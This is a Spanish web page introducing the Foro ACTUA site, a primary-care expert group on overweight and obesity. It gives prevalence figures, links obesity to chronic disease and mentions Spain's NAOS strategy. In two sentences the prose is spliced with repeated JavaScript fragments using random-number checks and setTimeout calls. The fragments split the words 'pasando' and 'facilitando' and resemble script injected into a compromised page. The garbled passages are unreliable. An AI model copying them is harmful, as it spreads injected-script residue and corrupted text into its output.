Web_Foroactua16-15

El exceso de peso es un problema muy importante en los tiempos que corren por varias razones:

a) Por su magnitud:

En el mundo hay más de mil millones de adultos (y cada vez más niños) con sobrepeso, de los que 300 millones son obesos. Estas cifras aumentan cada año. En España, el 54,7% de la población tiene exceso de peso; de este porcentaje, un 39,2% padece sobrepeso y un 15,5% obesidad. La prevalencia del exceso de peso en España está en constante aumento.

b) Por su asociación causal con las patologías graves y muy prevalentes.

El sobrepeso y la obesidad están en la base de numerosas enfermedades crónicas, desde la dislipemia a la diabetes mellitus o el síndrome metabólico, pasandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando por las enfermedades cardiovasculares, cerebrovasculares, y otras vasculopatías periféricas, o bien, la apnea del sueño, dificultades osteoarticulares, etc. De hecho, es uno de los diez factores que la OMS identifca como responsables de más de la tercera parte de las muertes.

c) Por la importancia de su prevención y tratamiento, conceptualmente muy simples, pero en la práctica muy difíciles de conseguir.

No sólo han de implicarse los profesionales y las sociedades científicas. También es necesaria una muy seria apuesta en este sentido de organismos oficiales como la OMS, y de los diferentes gobiernos como demuestra la strategia NAOS (Nutrición, Actividad, prevención de la Obesidad y Salud) del Ministerio de Sanidad y Consumo español.
Expertos en obesidad de toda España han venido manteniendo reuniones en los últimos años en el seno del “Foro ACTUA” (Abordaje y reComendaciones de acTuación Útil sobre el exceso de peso en Atención primaria). Fruto de estos debates y puestas en común han sido publicaciones en revistas científicas, y guías de actuación que han venido facilitandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando el tratamiento del exceso de peso en el marco de la Atención Primaria.

El debate emprendido se basa en la comunicación directa entre profesionales, por lo que ha de ser vivo, actual, interdisciplinario, sin fronteras, participativo, aglutinador,… y qué mejor que abrir las puertas a Internet. Es ésta la razón de ofrecer esta web, lugar de encuentro donde ofrecer información útil y de calidad al profesional de la salud, y donde ordenar la participación de los interesados en obesidad.

Ofrecemos con todo el cariño e ilusión nuestro esfuerzo para coordinar este grupo. Ojalá sea una semilla que germine pronto.